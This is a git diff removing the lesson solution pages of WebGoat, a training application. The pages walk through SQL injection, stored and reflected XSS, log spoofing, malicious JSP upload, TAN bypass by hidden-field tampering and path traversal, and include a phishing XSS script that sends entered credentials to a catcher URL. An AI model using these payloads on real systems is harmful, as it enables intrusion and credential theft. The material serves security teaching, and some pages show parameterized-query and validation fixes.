-In role-based access control scheme, a role represents -a set of access permissions and privileges. A user can be -assigned one or more roles. A role-based access control -normally consists of two parts: role permission management -and role assignment. A broken role-based access -control scheme might allow a user to perform accesses -that are not allowed by his/her assigned roles, or -somehow obtain unauthorized roles. -

- -

General Goal(s):
-Your goal is to explore the access control -rules that govern this site. Each role has permission to -certain resources (A-F). Each user is assigned one or more roles. -Only the user with the [Admin] role should have access -to the 'F' resources. In a successful attack, a user doesn't -have the [Admin] role can access resource F. -

- -

-Solution:
-In stage 1 we tried to use an action we are not authorised to use. -In this stage we want to view a profile of an other person. We have the permission -for the action ViewProfile but we should not have the permission to see a profile -of another employee! -

-

-Log in as Tom with tom as password. Click on Tom's name in the list and make sure -webscarab will intercept the next request. Change the employee_id for example to 101.

- -deleteAction - - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png b/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png
deleted file mode 100644
index a56105599..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png b/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png
deleted file mode 100644
index cfb490dec..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html
deleted file mode 100644
index 3920f2aea..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html
+++ /dev/null
@@ -1,41 +0,0 @@
- - - - -Solution Lab SQL Injection Stage3 - - - -

Lesson Plan Title: How to Perform a SQLInjection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven -site. The methods behind an attack are easy to learn and the damage -caused can range from considerable to complete system compromise. -Despite these risks, an incredible number of systems on the internet are -susceptible to this form of attack.

- -

Not only is it a threat easily instigated, it is also a threat -that, with a little common-sense and forethought, can easily be -prevented.

- -

It is always good practice to sanitize all input data, especially -data that will used in OS command, scripts, and database queiries, even -if the threat of SQL injection has been prevented in some other manner. -

- -

General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also -implement code changes in the web application to defeat these attacks.

- -

Solution:
-Choose Larry to log in with password larry. Select yourself from the list -and make sure that WebScarab will intercept the next request. Replace the id 101 with following: -
-101 OR 1=1 ORDER BY salary desc
-

With '101 OR 1=1' we have a SQL Statement which is always true. It will -get all the employees from the db but only return one of them. That is why we have to ensure we get -the "Big Fish" which is the employee earning most. With 'ORDER BY SALARY DESC' we guarantee exactly this. - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html deleted file mode 100644 index e09478565..000000000 --- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html +++ /dev/null @@ -1,87 +0,0 @@ - - - - -Solution Lab SQL Injection Stage2 - - - -

Lesson Plan Title: How to Perform a SQLInjection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven -site. The methods behind an attack are easy to learn and the damage -caused can range from considerable to complete system compromise. -Despite these risks, an incredible number of systems on the internet are -susceptible to this form of attack.

- -

Not only is it a threat easily instigated, it is also a threat -that, with a little common-sense and forethought, can easily be -prevented.

- -

It is always good practice to sanitize all input data, especially -data that will used in OS command, scripts, and database queiries, even -if the threat of SQL injection has been prevented in some other manner. -

- -

General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also -implement code changes in the web application to defeat these attacks.

- -Solution:
-To prevent a SQLInjection you can use "Parametreized Queries". This kind of -query makes it possible to use every input of an user as a parameter. -In this lesson you have to change org.owasp.webgoat.lessons.SQLInjection.Login.java -The query execution in the method login looks like this:

-String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
-// System.out.println("Query:" + query);
-try
-{
-  Statement answer_statement = WebSession.getConnection(s)
-      .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-  ResultSet answer_results = answer_statement.executeQuery(query);
-  etc...
-
-

-To paramerize the Query you have to replace the userinput with questionmarks:
-String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
-

-

-Now follows the try block with the getConnection method:
- -try
-{
-  Connection connection = WebSession.getConnections(s); -

-

-The next step is to do a so called "PrepareStatement":
-PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); -

-

-Now that the query is prepared we have to add the parameters to the query:
- -statement.setString(1, userId);
-statement.setString(2, password);
-
-

-

-We are ready to execute the query!
- -ResultSet answer_results = statement.executeQuery(); -

-

Putting everything together results in:
-


-String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
-try
-{
-  Connection connection = WebSession.getConnections(s);
-  PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-  statement.setString(1, userId);
-  statement.setString(2, password);
-  ResultSet answer_results = statement.executeQuery();
-  etc...
-
- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html
deleted file mode 100644
index 8016c18a9..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #2.html
+++ /dev/null
@@ -1,51 +0,0 @@
- - - - -Solution Lab SQL Injection Stage4 - - - -

Lesson Plan Title: How to Perform a SQLInjection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven -site. The methods behind an attack are easy to learn and the damage -caused can range from considerable to complete system compromise. -Despite these risks, an incredible number of systems on the internet are -susceptible to this form of attack.

- -

Not only is it a threat easily instigated, it is also a threat -that, with a little common-sense and forethought, can easily be -prevented.

- -

It is always good practice to sanitize all input data, especially -data that will used in OS command, scripts, and database queiries, even -if the threat of SQL injection has been prevented in some other manner. -

- -

General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also -implement code changes in the web application to defeat these attacks.

- -Solution:
-The solution is simular to Stage2. That is why here is only a short solution.
-You have to alter the class org.owasp.webgoat.lessons.SQLInjection.ViewProfile.java
-Alter the method getEmployeeProfile to something like this: -

-String query = "SELECT employee.* "
-    + "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
-    + "ownership.employer_id = ? and ownership.employee_id = ?";
-try
-{
-  Connection connection = WebSession.getConnections(s);
-  PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-  statement.setString(1, userId);
-  statement.setString(2, subjectUserId);
-  ResultSet answer_results = statement.executeQuery();
-  etc...
-
- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html
deleted file mode 100644
index ce1d354a7..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab String SQL Injection.html
+++ /dev/null
@@ -1,39 +0,0 @@
- - - - -Solution Lab SQL Injection Stage1 - - - -

Lesson Plan Title: How to Perform a SQLInjection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven -site. The methods behind an attack are easy to learn and the damage -caused can range from considerable to complete system compromise. -Despite these risks, an incredible number of systems on the internet are -susceptible to this form of attack.

- -

Not only is it a threat easily instigated, it is also a threat -that, with a little common-sense and forethought, can easily be -prevented.

- -

It is always good practice to sanitize all input data, especially -data that will used in OS command, scripts, and database queiries, even -if the threat of SQL injection has been prevented in some other manner. -

- -

General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also -implement code changes in the web application to defeat these attacks.

- -

Solution:
-Select Neville as user to log in. Make sure WebScarab will intercept the next request. -Hit the Login Button and Change the password parameter in WebScarab to smith' OR '1' = '1. -Et voila you are logged in as Neville without knowing the password as the query -will lookup if the password is smith and if not it controls if 1=1 what -return true.

- -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html
deleted file mode 100644
index 28a31d1eb..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Reflected XSS.html
+++ /dev/null
@@ -1,32 +0,0 @@
- - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -Solution:
-The Solution is rather simular to stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java. -Alter the method getRequestParameter. The body of the mehtod should look something like this:

-String regex = "[\\s\\w-,]*";
-String parameter = s.getParser().getRawParameter(name);
-Pattern pattern = Pattern.compile(regex);
-validate(parameter, pattern);
-		
-return parameter;
-
- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
deleted file mode 100644
index fd834d3c0..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Input Validation.html
+++ /dev/null
@@ -1,46 +0,0 @@
- - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -

Solution:
-You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is -placed in the package org.owasp.webgoat.lessons.CrossSiteScripting
-The place to code is marked! Following code will work:
-

-

- -/**Your code**/
-String regex = "[\\s\\w-,]*";
-String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+
startDate+ccn+disciplinaryActionDate+
disciplinaryActionNotes+personalDescription;
-Pattern pattern = Pattern.compile(regex);
-validate(stringToValidate, pattern);
-/**End of your code**/ -
-

-

-This validation allows following:
-\s = whitspace: \t\n\x0B\f\r
-\w = word: a-zA-Z_0-9
-and the characters - and , -

-

-Use of any other character will throw a Validation Exception. -

- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
deleted file mode 100644
index 52a4b3283..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Block Stored XSS using Output Encoding.html
+++ /dev/null
@@ -1,26 +0,0 @@
- - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -

Solution:
-You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder. -

This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class. -Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.

- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
deleted file mode 100644
index e53bc0e3c..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Reflected XSS.html
+++ /dev/null
@@ -1,27 +0,0 @@
- - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -

Solution:
-First log in as an user for example as Larry with password larry. Now click on -the 'SearchStaff' Button. Burry a script in the field for example: -<script>alert("Dangerous");</script>. Now hit -the 'FindProfile' Button and you are done.

- - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html
deleted file mode 100644
index 50f976cc4..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS Revisited.html
+++ /dev/null
@@ -1,27 +0,0 @@
- - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -

Solution:
-Log in as David with david as password. Choose Bruce from the List and click -on the 'ViewProfile' Button. - -

- - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html b/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html deleted file mode 100644 index a57dc020a..000000000 --- a/src/main/webapp/lesson_solutions_1/Lab XSS/Lab Stored XSS.html +++ /dev/null @@ -1,36 +0,0 @@ - - - - -Solution Lab Block Stored XSS - - - -

Lesson Plan Title: How to Perform Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. -XSS can also occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. -

- -

General Goal(s):
-For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks. -

- -

Solution:
-First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button. -Now should appear Tom's Profile. Click on the 'Edit Profile' Button and try an XSS attack on the street filed.
-For example: <script>alert("Got Ya");</script>
-Click on the UpdateProfile Button and Log out.

-

- -stored_xss.png - -

-Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the -ViewProfile Button. Congratulation! You have completed the lesson. - -

- - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png b/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png deleted file mode 100644 index 83aa7983e..000000000 Binary files a/src/main/webapp/lesson_solutions_1/Lab XSS/images/stored_xss.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions_1/LogSpoofing.html b/src/main/webapp/lesson_solutions_1/LogSpoofing.html deleted file mode 100644 index c1538709d..000000000 --- a/src/main/webapp/lesson_solutions_1/LogSpoofing.html +++ /dev/null @@ -1,793 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Log Spoofing.

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches attempts to fool the human eye.

- -

 

- -

How the -attacks works: The attack -is based on fooling the human eye in log files. An attacker can erase his -traces from the logs using this attack.

- -

 

- -

General -Goal(s):

- -

The -grey area below represents what is going to be logged in the web server's log -file.
-Your goal is to make it like a username "admin" has succeeded into -logging in.
-Elevate your attack by adding a script to the log file.  

- -

 

- -

- -

Figure 1 Log Spoofing

- -

 

- -

Solution:

- -

 

- -

This lesson accepts any input for a username and appends the information -to the log file.

- -

 

- -

Enter for username the text: smith Login Succeeded for username admin

- -

 

- -

- -

Figure 2 Log spoof with long text

- -

 

- -

The text is added to the same line, not a new line. But any input is -allowed.

- -

In this way you can inject carriage return (%0d) and line feed (%0a) to -the application.

- -

 

- -

Fill out the following text for the username: Smith%0d%0aLogin Succeeded -for username: admin

- -

 

- -

- -

Figure 3 Lesson completed

- -

 

- -

An attacker -can use this attack to add malicious JavaScript to the log file, which will be -viewed by the administrator using a browser. What happens when you inject admin -<script>alert(document.cookie)</script> for the username?

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html b/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html deleted file mode 100644 index 0a4e0b348..000000000 --- a/src/main/webapp/lesson_solutions_1/MaliciousFileExecution.html +++ /dev/null @@ -1,46 +0,0 @@ - - - - -Solution: Malicious File Execution - - - -

Lesson Plan Title: Malicious File Execution

- -

Concept / Topic To Teach:
-Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server. -

- -

General Goal(s):
-The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.

- -In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt

- -Once you have created this file, you will pass the lesson. -

- -Solution:

-The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file guest.txt in the directory provided in the lesson (the path is generated based on your system).

-To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:
- -<HTML> -<% -java.io.File file = new java.io.File("filepath\\guest.txt"); -file.createNewFile(); -%> -</HTML>

-The <% indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by \\, not \. The filename of the .jsp doesn't matter, as long as you know what it is.

-Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.
-
-Viewing properties of the uploaded image in Firefox.



-
-File path for the uploaded image (and our .jsp) in Firefox.

-The URL should look something like http://localhost/WebGoat/uploads/image.jpg.
-The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like http://localhost/WebGoat/uploads/yourfile.jsp.

-A blank page will load. You can then return to the lesson and refresh, completing the lesson.


- - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html deleted file mode 100644 index d45f1508b..000000000 --- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html +++ /dev/null @@ -1,71 +0,0 @@ - - - - -Multi Level Login 1 - - - -

Lesson Plan Title: Multi Level Login 1

- -

Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication. -This is archived by adding a second layer. After having logged -in with your user name and password you are asked for a -'Transaction Authentication Number' (TAN). This is often used by -online banking. You get a list with a lots of TANs generated only -for you by the bank. Each TAN is used only once. Another method is -to provide the TAN by SMS. This has the advantage that an attacker - can not get TANs provided by the user. -

- -

General Goal(s):
-In this Lesson you try to get around the strong authentication. -You have to break into another account. The user name, password -and a already used TAN is provided. You have to make sure the server -accept the TAN even it is already used. -

- -Solution:
-This Lesson has two stages. The first stage is only to show how a multi level login -works. In the second you have to break the strong authentication. -

-Stage 1
-This stage should be rather straight forward. Give in as name Jane -and as password tarzan.

-
-
-Figure 1: Login Screen -

-Afthr clicking on the submit button -you will be asked for the TAN.

-
-
-Figure 2: TAN Screen -
-
-Choose the correct TAN from the -list provided, click on the submit button and you are done. - -

-Stage 2
-The first step in this stage is equal to Stage 1. Log in as Jane with tarzan as password. -Now you will be asked for a TAN. Unfortunately you have only a already -used TAN from the victim. Fill in the TAN you have and make sure that WebScarab -will intercept the next request. Hit the submit button and change the hidden_tan -value to 1.

-
-
-Figure 3: Manipulation Of The Hidden Field With WebScarab -


-Congratulations you are logged in as Jane.

- -
-
-Figure 4: Manipulation Of The Hidden Field With WebScarab -
- - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html deleted file mode 100644 index bb63045b9..000000000 --- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html +++ /dev/null @@ -1,43 +0,0 @@ - - - - -Multi Level Login 2 - - - -

Lesson Plan Title: Multi Level Login 2

- -

Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication. -This is archived by adding a second layer. After having logged -in with your user name and password you are asked for a -'Transaction Authentication Number' (TAN). This is often used by -online banking. You get a list with a lots of TANs generated only -for you by the bank. Each TAN is used only once. Another method is -to provide the TAN by SMS. This has the advantage that an attacker - can not get TANs provided by the user. -

- -

General Goal(s):
-In this lesson you have to try to break into another account. -You have an own account for WebGoat Financial but you want to log into -another account only knowing the user name of the victim to attack. -

- -Solution:
-The solution for this lesson is similar to the solution from -multi level login 1 stage 2 but the approach is a little different. -This time you have only the user name of your victim but an own account -on WebGoat Financial.

-Log in as Joe with password banana. Now make sure the next request will be intercepted -by WebScarab. Fill in the TAN you are asked for and hit the submit button. -Change now the hidden_user value from Joe to Jane and you are logged in -as Jane. -
-
-Figure 1: Manipulation Of The Hidden Field With WebScarab -
- - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/OffByOne.html b/src/main/webapp/lesson_solutions_1/OffByOne.html deleted file mode 100644 index 0447a1fbc..000000000 --- a/src/main/webapp/lesson_solutions_1/OffByOne.html +++ /dev/null @@ -1,14 +0,0 @@ - - - - -Solution: Modify Data with SQL - - - -

Lesson Plan Title: Off By One Buffer Overflows

- -

This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to WebGoat@owasp.org.

- - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/PasswordStrength.html b/src/main/webapp/lesson_solutions_1/PasswordStrength.html deleted file mode 100644 index 39f816477..000000000 --- a/src/main/webapp/lesson_solutions_1/PasswordStrength.html +++ /dev/null @@ -1,37 +0,0 @@ - - - - -password Strength - - - -

Lesson Plan Title: Password Strength

- -

Concept / Topic To Teach:

- -Accounts are only as secure as there passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better. - -
-

General Goal(s):

- For this exercise, your job is to test several passwords on https://howsecureismypassword.net/. -

-Solution:
-Open your browser on https://howsecureismypassword.net/. Copy the first password in the field and the page will automatically be updated.

-
-Password checker


-You will get get the result of the check.

-
-The result


-Do this with all of the six given passwords.

-Here are the results you get:

- -Password = 123456: 0 seconds
-Password = abzfezd: 2 seconds
-Password = a9z1ezd: 19 seconds
-Password = aB8fEzDq: 15 hours
-Password = z8!E?7: 20 days
-Password = My1stPassword!:Redd: 364 quintillion years
-


- - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html b/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html deleted file mode 100644 index 80c9bdb5a..000000000 --- a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html +++ /dev/null @@ -1,650 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Bypass a Path Based Access -Control Scheme

- -

Concept / Topic To Teach: -
-In a path based access control scheme, -an attacker can traverse a path by providing relative path information. -Therefore an attacker can use relative paths to access files that normally are -not directly accessible by anyone, or would otherwise be denied if requested -directly.

- -

General Goal(s): -
-The user should be able to -access a file that is not in the listed directory.

- -

- -

Figure 1 Lesson 8

- -

 

- -

Solution:

- -

 

- -

This lesson -can be solved by intercepting the filename in WebScarab and replacing it with -../main.jsp which is a file located in a folder below the current directory.

- -

 

- -

- -

Figure 2 Change the variable File

- -

 

- -

- -

Figure 3 Lessen 8 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/Phishing.html b/src/main/webapp/lesson_solutions_1/Phishing.html deleted file mode 100644 index ac817a401..000000000 --- a/src/main/webapp/lesson_solutions_1/Phishing.html +++ /dev/null @@ -1,69 +0,0 @@ - - - -Phising with XSS - - - -

Lesson Plan Title: Phishing with XSS

- -

Concept / Topic To Teach:
-It is always a good practice to validate all input on the -server side. XSS can occur when unvalidated user input is used -in an HTTP response. With the help of XSS you can do a Phishing -Attack and add content to a page which looks official. It is very -hard for a victim to determinate that the content is malicious. -

- -

General Goal(s):
-The user should be able to add a form asking for username -and password. On submit the input should be sent to -http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName -

- -Solution:
-With XSS it is possible to add further elements to an existing Page. -This solution consists of two parts you have to combine: -
    -
  • A form the victim has to fill in
  • -
  • A script which reads the form and sends the gathered information to the attacker
  • -
-A Form with username and password could look like this:
-

-</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 -><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" -name = "pass"><br></form><br><br><HR> -

Search for this term and you will see that a form is added to the page since the search field accepts HTML. -
The initial </form> tag is to terminate the original search form. -

-Now you need a script: -

-<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ -document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. -User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} -</script> -

-

-This script will read the input from the form and send it to the catcher of WebGoat.
-The text in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
-The last step is to put things together. Add a Button to the form which -calls the script. You can reach this with the onclick="myFunction()" handler: -

-

-<input type="submit" name="login" value="login" onclick="hack()"> -

-The final String looks like this:
-</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ -document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. -User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} -</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 -><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" -name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> -

-Search for this String and you will see a form asking for your username and password. -Fill in these fields and click on the Login Button, which completes the lesson.

-
-New login field after submitting the script.


- - - diff --git a/src/main/webapp/lesson_solutions_1/ReflectedXSS.html b/src/main/webapp/lesson_solutions_1/ReflectedXSS.html deleted file mode 100644 index 7ae3f6a66..000000000 --- a/src/main/webapp/lesson_solutions_1/ReflectedXSS.html +++ /dev/null @@ -1,685 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Perform Reflected Cross Site -Scripting (XSS) Attacks

- -

Concept / Topic To Teach:
-It is always a good practice to validate -all input on the server side. XSS can occur when unvalidated user input is used -in an HTTP response. In a reflected XSS attack, an attacker can craft a URL -with the attack script and post it to another website, email it, or otherwise -get a victim to click on it.

- -

General Goal(s):
-
For this exercise, your -mission is to come up with some input containing a script. You have to try to -get this page to reflect that input back to your browser, which will execute -the script and do something bad.

- -

- -

Figure 1 Lesson 15

- -

 

- -

Solution:

- -

 

- -

Enter -<script>alert('Bang!')</script> for the PIN value

- -

 

- -

- -

Figure 2 Lesson 15 Completed

- -

 

- -
-
- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html b/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html deleted file mode 100644 index b154b0c40..000000000 --- a/src/main/webapp/lesson_solutions_1/RemoteAdminFlaw.html +++ /dev/null @@ -1,666 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: Remote -Admin Access

- -

 

- -

Concept / -Topic To Teach:

- -

